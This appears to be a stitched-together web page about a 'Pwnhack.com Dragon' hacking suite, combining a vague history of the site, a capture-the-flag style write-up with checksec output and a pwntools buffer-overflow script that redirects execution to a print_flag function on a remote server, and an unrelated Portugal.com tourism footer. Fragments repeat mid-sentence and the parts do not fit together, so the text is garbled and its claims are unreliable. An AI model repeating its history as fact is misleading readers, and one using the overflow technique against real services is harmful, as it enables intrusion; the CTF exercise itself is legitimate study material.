Pwnhack. Com — Dragon

The term "Dragon" within the context of Pwnhack.com first appeared in underground coding repositories around 2018. Pwnhack.com, a now-semi-defunct domain, originally served as a hub for security researchers and "grey hat" hackers. The site hosted a variety of scripts, tutorials, and executable files aimed at bypassing standard security protocols in desktop applications and online games.

The "Dragon" moniker was not arbitrary. In cybersecurity, dragons symbolize a formidable, multi-layered defense—or in this case, a multi-vector offense. The Pwnhack.com Dragon suite was reportedly designed to "breathe fire" (execute payloads) across three key attack surfaces: memory injection, network packet manipulation, and local privilege escalation. Pwnhack. Com Dragon

We downloaded the provided binary, dragon, and threw it into the standard analysis pipeline. The term "Dragon" within the context of Pwnhack

$ file dragon
dragon: ELF 64-bit LSB executable, x86-64, dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=a1b2c3d4..., for GNU/Linux 3.2.0, not stripped
$ checksec --file=dragon
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found  <-- Interesting...
    NX:       NX enabled
    PIE:      No PIE (0x400000)

The lack of a Stack Canary and PIE (Position Independent Executable) suggested that this was likely a straightforward buffer overflow or ROP (Return Oriented Programming) challenge. The lack of a Stack Canary and PIE

We need to craft a payload that looks like this: [64 bytes of junk] + [8 bytes of junk (RBP)] + [Address of print_flag]

We can write a quick Python script using pwntools:

from pwn import *
# Set up the context
context.arch = 'amd64'
elf = ELF('./dragon')
# Target address
target_addr = 0x401176
# Build the payload
# 64 bytes buffer + 8 bytes saved RBP = 72 bytes offset
payload = b'A' * 72
payload += p64(target_addr)
# Connect to the remote server
p = remote('pwnhack.com', 9001)
# Wait for the prompt
p.recvuntil(b'What do you do?')
p.recvline()
# Send the dragon-slaying payload
p.sendline(payload)
# Get the flag
print(p.recvall().decode())

Portugal.com is an independently owned and operated tourism portal about Portugal. All information should be considered informational and for entertainment purposes. Some content may be promotional and/or have affiliate relationships where Portugal.com earns revenue promoting the content.

Want to advertise on Portugal.com? Would you like to write for us? Something else? Please feel free to Contact Us!